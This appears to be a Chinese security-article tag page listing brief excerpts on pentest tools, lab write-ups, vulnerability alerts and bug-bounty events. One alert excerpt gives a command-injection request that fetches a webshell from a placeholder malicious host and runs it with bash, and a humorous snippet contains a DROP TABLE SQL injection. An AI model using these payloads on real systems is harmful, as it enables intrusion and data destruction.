工具推荐 | 最新开源若依Vue漏洞检测工具
工具推荐 | 最新开源若依Vue漏洞检测工具 kk12-30 星落安全团队 2025-05-14 16:01 点击上方 蓝字 关注我们 现在只对常读和星标的公众号才展示大图推送,建议大家能把 星落安全团队 “ 设为星标 ”, 否则可能就看不到了啦 ! 工具介绍 Ruoyi-Vue-Tools 由开发者 kk12-30 基于 Python 开发的若依 Vue 框架漏洞检测工具 关键特性 技术栈 开发
继续阅读标签: 内网渗透
小迪VPC1红队内网渗透靶场-PHPRCE-永恒之蓝-防火墙上线-密码喷射-DC域控提权-weblogic
小迪VPC1红队内网渗透靶场-PHPRCE-永恒之蓝-防火墙上线-密码喷射-DC域控提权-weblogic Pass_security 亿人安全 2025-05-14 03:37 原文链接:https://www.freebuf.com/articles/web/430751.html 引言 近期利用闲暇时间,我对小迪老师提供的靶场环境进行了全面的渗透测试实战演练。本次记录旨在详细还原整个渗透过程
继续阅读java代码审计之常见漏洞学习
java代码审计之常见漏洞学习 原创 Z0安全 Z0安全 2025-05-12 06:24 前言 Java代码审计中常见的一些漏洞学习总结以及一些审计思路。 1. SQL注入:数据库的隐形杀手 成因 未过滤的用户输入直接拼接至SQL语句,导致恶意SQL执行。 高危场景 • MyBatis:使用${} 动态拼接参数(如like ‘%${title}%’ ) • Hiberna
继续阅读工具推荐 | MSSQL多功能集合命令执行利用工具
工具推荐 | MSSQL多功能集合命令执行利用工具 Mayter 星落安全团队 2025-05-07 16:00 点击上方 蓝字 关注我们 现在只对常读和星标的公众号才展示大图推送,建议大家能把 星落安全团队 “ 设为星标 ”, 否则可能就看不到了啦 ! 工具介绍 一款针对Microsoft SQL Server的多功能安全测试工具,集成多种命令执行技术,支持: 1. 传统命令执行方式 1. xp
继续阅读五一福利 | 抽CNVD高危漏洞
五一福利 | 抽CNVD高危漏洞 原创 鲸落 Rot5pider安全团队 2025-05-03 06:14 点击上方蓝字 关注安全知识 引 言 欢迎加 技术交流群 ,随意聊, 禁发广告、政治 赌毒等,嘿嘿 群若满,请添加: The_movement,备注: 进群 活动时间 :2025年5月3日00:00 – 5月8日8:30参与方式 :关注公众号 + 转发指定本文 一、活动规则(核
继续阅读【安全圈】苹果隔空播放(AirPlay)协议存在可蠕虫的远程代码执行漏洞 可批量感染大量设备
【安全圈】苹果隔空播放(AirPlay)协议存在可蠕虫的远程代码执行漏洞 可批量感染大量设备 安全圈 2025-05-01 11:00 关键词 安全漏洞 安全研究团队近日披露,苹果AirPlay无线协议及其软件开发套件存在重大安全缺陷,可能引发全球范围内的大规模”蠕虫式”网络攻击。该漏洞集合被命名为”AirBorne”,涉及23个独立安全漏洞,其中1
继续阅读核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338)
核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338) 云梦DC 云梦安全 2025-04-28 01:01 0x01 漏洞杀伤链 攻击向量: GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1 Host: target-ip 实现效果: ✅ 任意命令执行(代码注入) ✅ /e
继续阅读【文章转载】DragonForce与Anubis再掀风暴:勒索软件“加盟制”全面升级,你的数据还安全吗?
【文章转载】DragonForce与Anubis再掀风暴:勒索软件“加盟制”全面升级,你的数据还安全吗? solarsec solar应急响应团队 2025-04-27 07:41 点击蓝字 关注我们 尽管国际执法部门成功打击了多个知名勒索软件组织,但网络犯罪分子依然展现出极强的韧性和适应能力。2025年,Secureworks® 威胁对抗中心(Counter Threat Unit™,简称CTU
继续阅读170页 漏洞挖掘总结
170页 漏洞挖掘总结 计算机与网络安全 2025-04-26 23:57 扫码加入知识星球: 网络安全攻防(HVV) 下载全套资料 漏洞挖掘是信息安全领域的重要技术手段,旨在发现软件、系统或网络中的潜在安全缺陷。其核心在于通过主动测试与逆向分析,定位可能被攻击者利用的薄弱环节。典型流程通常从信息收集开始,包括目标系统的版本信息、开放端口、服务框架等基础数据,例如使用Nmap扫描工具获取网络拓扑结
继续阅读【红队】一款全方位扫描工具,具备高效的机器探活,端口探活,协议识别,指纹识别,漏洞扫描等功能
【红队】一款全方位扫描工具,具备高效的机器探活,端口探活,协议识别,指纹识别,漏洞扫描等功能 polite-007 贝雷帽SEC 2025-04-26 03:48 免责声明 本公众号所提供的文字和信息仅供学习和研究使用, 请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任 。 工具来自网络,安全性自测,如有侵权请联系删除。 工具介绍 一
继续阅读Top 10 漏洞不懂?这还不手拿把掐吗?
Top 10 漏洞不懂?这还不手拿把掐吗? 点击关注👉 马哥网络安全 2025-04-25 09:01 1. SQL注入(SQL Injection) 段子 : HR:你叫什么名字? 程序员:’; DROP TABLE 员工表; — HR:你被录用了!(然后公司数据库消失了) 技术原理 : – 攻击者通过输入恶意SQL代码,欺骗数据库执行非法操作(比如删库、窃取
继续阅读【红队】JNDIExploit 改进版
【红队】JNDIExploit 改进版 pap1rman 贝雷帽SEC 2025-04-25 05:24 免责声明 本公众号所提供的文字和信息仅供学习和研究使用, 请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任 。 工具来自网络,安全性自测,如有侵权请联系删除。 工具介绍 对原版JNDIExploit进行修改增加内存马模块和本地序列
继续阅读攻防实战绕过disable_function命令执行
攻防实战绕过disable_function命令执行 原创 ashui Rot5pider安全团队 2025-04-25 02:59 蓝 队 蓝队短期HVV攻防演练项目招聘(北京) 工作内容: 负责前期渗透测试及HVV(攻防演练)期间的安全研判、不需要应急。 项目周期: 2个月(含前期渗透准备阶段及HVV实战阶段),五一后启动,具体入场时间面试通过后通知。 工作地点: 北京 薪资待遇: 税前月薪
继续阅读【漏洞预警】:紧急!H3C GR-3000AX代码执行漏洞或成内网渗透跳板
【漏洞预警】:紧急!H3C GR-3000AX代码执行漏洞或成内网渗透跳板 原创 52 易云安全应急响应中心 2025-04-23 07:35 点击上方蓝字 关注我们 漏洞预警 1、漏洞描述 近日,易云科技监测到一则H3C GR-3000AX远程代码执行漏洞。 H3C GR-3000AX 是新华三(H3C)推出的一款高性能企业级 Wi-Fi 6 无线路由器。产品 支持多场景组网, 支持 Wi-Fi
继续阅读【SRC】某选课小程序任意用户登录漏洞深度剖析
【SRC】某选课小程序任意用户登录漏洞深度剖析 原创 ashui Rot5pider安全团队 2025-04-22 00:35 某小程序任意用户登录漏洞深度剖析 一、漏洞场景复现 (一)漏洞复现 目标系统 :某金融类小程序(版本V2.3.1) 1. 测试工具 :Burp Suite Pro v1.8.4 + WechatDevTools v1.18.0 关键参数 : encryptedData :
继续阅读用 AI 自动化渗透测试,PentAGI 打造全新AI安全测试 助力快速发现漏洞与安全隐患|漏洞探测
用 AI 自动化渗透测试,PentAGI 打造全新AI安全测试 助力快速发现漏洞与安全隐患|漏洞探测 原创 CeBain 渗透安全HackTwo 2025-04-21 16:03 0x01 工具介绍 网络安全攻防战已进入白热化阶段,传统手动测试效率低下。PentAGI的横空出世,正在用AGI技术重构安全测试的底层逻辑。VXControl 团队打造的开源工具,凭借自动化、智能化的设计,为安全测试注入
继续阅读[网络侦查] 一款使用简单的批量信息收集与供应链漏洞探测工具
[网络侦查] 一款使用简单的批量信息收集与供应链漏洞探测工具 原创 子午猫 网络侦查研究院 2025-04-20 02:01 网络侦查工作的痛点与突破 在现代网络安全领域, 网络侦查的工作往往面临着重复性高、效率低下的问题。为了优化工作流程,减少机械性操作,一款名为dddd的批量信息收集与供应链漏洞探测工具应运而生。这款工具不仅功能强大,而且使用简单,能够显著提升 网络侦查的工作效率。本文将详细介
继续阅读FreeBuf周报 | CVE漏洞数据库项目面临停摆危机;Apache Roller 高危漏洞改密后会话仍有效
FreeBuf周报 | CVE漏洞数据库项目面临停摆危机;Apache Roller 高危漏洞改密后会话仍有效 FreeBuf 2025-04-19 10:02 各位 Buffer 周末好,以下是本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、一周好文,保证大家不错过本周的每一个重点! 🔐美国国土安全部终止资助,CVE漏洞数据库项目面临停摆危机 🛡️美国CISA紧急拨款维持CVE漏洞数据
继续阅读AD域内网渗透-三种漏洞利用方式
AD域内网渗透-三种漏洞利用方式 jzhoucdc 泷羽Sec 2025-04-19 00:11 本文基于AD域内网渗透中三种漏洞利用的学习记录。 PrintNightmare PrintNightmare包括两项漏洞CVE-2021-34527 和 CVE-2021-1675,这些漏洞存在于Windows操作系统上的打印后台处理程序(Print Spooler)服务中。目前基于该漏洞,已经有很多
继续阅读一文掌握 Java XXE 漏洞原理、利用与防御姿势
一文掌握 Java XXE 漏洞原理、利用与防御姿势 原创 火力猫 季升安全 2025-04-18 14:13 🧨 Java XXE 漏洞审计大全 一看就懂、二看就能用、三看就能把审计搞定! 🧠 一、什么是 XXE? XXE(XML External Entity)漏洞 是利用 XML 的“外部实体”功能,让服务器读取本地文件或访问远程地址(如 SSRF)。常见后果: – 读取文件(/
继续阅读【代码审计】某友云平台远程命令执行漏洞
【代码审计】某友云平台远程命令执行漏洞 原创 WL Rot5pider安全团队 2025-04-18 00:39 点击上方蓝字 关注安全知识 引 言 此漏洞未公开未公开漏洞 某友云平台远程命令执行漏洞 漏洞概述 xxx云平台存在未授权SQL注入漏洞,攻击者可通过构造恶意JSON请求实现数据库版本信息泄露,进而可能获取服务器控制权限。 影响版本 复现环境 参数 值 请求方式
继续阅读【漏洞与预防】畅捷通文件上传漏洞预防
【漏洞与预防】畅捷通文件上传漏洞预防 原创 solarsec solar应急响应团队 2025-04-17 06:22 1.典型案例 本次案例参考去年3月期间TellYouThePass勒索病毒家族常用的攻击手法,关于该家族的病毒分析详情可参考 【病毒分析】locked勒索病毒分析 。 2.场景还原 2.1场景设置 在本次模拟攻击场景中,攻击者首先利用畅捷通CNVD-2022-60632文件上传漏
继续阅读工具推荐 | OSS存储桶遍历漏洞自动化利用工具
工具推荐 | OSS存储桶遍历漏洞自动化利用工具 jdr2021 星落安全团队 2025-04-13 16:02 点击上方 蓝字 关注我们 现在只对常读和星标的公众号才展示大图推送,建议大家能把 星落安全团队 “ 设为星标 ”, 否则可能就看不到了啦 ! 工具介绍 由于经常遇到存储桶遍历漏洞,直接访问文件是下载,不方便预览,且甲方要求证明该存储桶的危害,,因此该工具应运而生。 使用javafx 做
继续阅读从CVE-2025-30208看任意文件读取利用
从CVE-2025-30208看任意文件读取利用 骨哥说事 2025-04-13 05:38 微信公众号:渊龙Sec安全团队 为国之安全而奋斗,为信息安全而发声! 如有问题或建议,请在公众号后台留言 如果你觉得本文对你有帮助,欢迎在文章底部赞赏我们 0# 概述 师傅们好久不见!最近不是特别忙,就研究研究最新的漏洞 刚好最近一大批漏洞都爆出来了,比如 CVE-2025-1097, CVE-2025-
继续阅读【曾哥】从CVE-2025-30208看任意文件读取利用
【曾哥】从CVE-2025-30208看任意文件读取利用 星悦安全 2025-04-04 11:03 微信公众号: 渊龙Sec安全团队 为国之安全而奋斗,为信息安全而发声! 如有问题或建议,请在公众号后台留言 如果你觉得本文对你有帮助,欢迎在文章底部赞赏我们 0# 概述 师傅们好久不见!最近不是特别忙,就研究研究最新的漏洞 刚好最近一大批漏洞都爆出来了,比如 CVE-2025-1097, CVE-
继续阅读从CVE-2025-30208看网络空间安全专业
从CVE-2025-30208看网络空间安全专业 梅苑安全 2025-04-03 22:04 微信公众号:渊龙Sec安全团队 为国之安全而奋斗,为信息安全而发声! 如有问题或建议,请在公众号后台留言 如果你觉得本文对你有帮助,欢迎在文章底部赞赏我们 0# 概述 师傅们好久不见!最近不是特别忙,就研究研究最新的漏洞 刚好最近一大批漏洞都爆出来了,比如 CVE-2025-1097, CVE-2025-
继续阅读漏洞盒子×阶跃星辰SRC | 漏洞盒子「企业SRC」新住客
漏洞盒子×阶跃星辰SRC | 漏洞盒子「企业SRC」新住客 漏洞盒子 2025-04-01 19:17 清明小长假倒计时! 挖蛙的踏青计划表已经写满 追春风、放纸鸢、啃青团…… 但总感觉少了点什么? 哦对!差点忘了带上蛙的新伙伴 TA不仅会写诗、画图、剪视频 还能用AI一眼看穿代码里的“小心思” 没错—— 阶跃星辰安全应急响应中心 正式入驻漏洞盒子啦! 即日起 阶跃星辰SRC欢迎广大白帽积极反馈安
继续阅读「1day」D-Link DIR 823G路由器存在未授权访问漏洞(CVE-2025-2360)
「1day」D-Link DIR 823G路由器存在未授权访问漏洞(CVE-2025-2360) 原创 zangcc Eureka安全 2025-03-25 18:23 在2025年3月25日,在Eureka威胁情报平台监测到了一处新的漏洞预警。在发现这一预警后, 我们的安全研究人员立即展开深入研究,力求全面了解该漏洞的性质、影响范围以及潜在的利用方 式。 需要明确的是,此次研究和分享基于技术研究
继续阅读专题·漏洞人才培养 | 网络安全白帽人才运营及创新实践
专题·漏洞人才培养 | 网络安全白帽人才运营及创新实践 原创 曾裕智 中国信息安全 2025-03-20 18:13 扫码订阅《中国信息安全》 邮发代号 2-786 征订热线:010-82341063 文 | 上海斗象信息科技有限公司 曾裕智 在当今数字化时代,网络安全已成为关乎国家安全、企业发展和个人隐私的关键领域。白帽人才作为专业的网络安全人员,通过对评测目标的网络和系统进行授权渗透测试,发现
继续阅读双倍积分 | 生活服务漏洞+爬虫双专测开启
双倍积分 | 生活服务漏洞+爬虫双专测开启 字节跳动安全中心 2025-03-12 11:17 专测时间 3月12日-3月26日 ① 安全漏洞专测 安全漏洞专测范围 【抖音团购相关模块】入口:抖音app-团购 【抖音来客】life.douyin.com 【抖音生意经】www.life-data.cn 【抖音集星】www.lifecreator.cn 【抖音本地直播专业版】eos.douyin.co
继续阅读